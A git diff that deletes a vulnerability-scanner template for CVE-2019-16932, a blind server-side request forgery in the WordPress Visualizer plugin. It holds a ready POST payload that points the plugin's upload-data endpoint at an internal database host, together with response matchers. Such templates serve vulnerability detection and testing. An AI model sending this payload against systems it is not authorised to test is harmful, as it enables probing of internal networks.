diff --git a/cves/2019/CVE-2019-16932.yaml b/cves/2019/CVE-2019-16932.yaml deleted file mode 100644 index e06c7a769c..0000000000 --- a/cves/2019/CVE-2019-16932.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2019-16932 - -info: - name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF) - author: akincibor - severity: high - description: | - This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint. - reference: - - https://wpscan.com/vulnerability/9892 - - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - metadata: - verified: true - tags: wp-plugin,ssrf,wordpress,wp,xss,unauth - -requests: - - method: POST - path: - - '{{BaseURL}}/wp-json/visualizer/v1/upload-data' - body: '{\"url\":\"http://db:3306\"}' - - headers: - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'db_1' - part: body